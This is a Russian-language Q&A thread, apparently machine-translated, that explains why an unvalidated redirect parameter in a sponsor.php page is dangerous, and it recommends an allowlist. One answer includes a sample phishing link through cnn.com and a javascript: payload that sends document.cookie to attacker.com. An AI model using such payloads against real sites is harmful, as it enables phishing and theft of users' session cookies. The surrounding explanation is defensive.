Можете ли вы найти здесь проблему с веб-безопасностью?

Это определенно угроза безопасности. Вам следует избегать использования переменных в URL, когда речь идет о безопасности.

Хотя ничто не является полностью безопасным, это гораздо лучший способ решения этой проблемы: http://www.webmasterworld.com/forum88/2910.htm

Если спонсор.php допускает любое значение в RedirectPage, И реклама подразумевает одобрение или побуждает людей думать, что они на правильном пути, вы открываете его, чтобы стать частью фишинг-атаки. Что еще хуже, вы, вероятно, выиграете от этих атак, что, скорее всего, вызовет у людей некоторое недовольство.

Ведение списка разрешенных URL-адресов (или шаблонов, которым они могут следовать) будет иметь большое значение для предотвращения проблем.

Это большая проблема. Если я пришлю вам ссылку, которая выглядит так:

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

Вы подумаете: «О, CNN, это законный сайт», откроете его и нажмете ссылку «Перейти на свою страницу». И тогда вы будете на одной из самых отвратительных порно сайтов в сети, и она будет иметь гигантский процветающий мужской голос объявляя всем вашим коллегам «Черт побери, я хочу! @ $ @ # $ Твой! (& ¤ & ^ $ §, пока я не смогу ¡⌐ ^ (! # ~~ & $ ^ #! @ $ !! «и вы должны объяснить своему боссу:» Я думал, что это было CNN! "

Отверстие здесь - твоя репутация. Подобные слепые перенаправления опасны.

И это всего лишь одна дыра. Как насчет этого?

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

Теперь я отредактировал ваш сайт с помощью XSS и украл куки вашего пользователя. Конечно, вы говорите, что нет информации для входа в систему, но как насчет данных сеанса? Или когда вы добавляете логин позже, или кто-то другой в вашей компании использует эту страницу через год, где пользователи вошли в систему.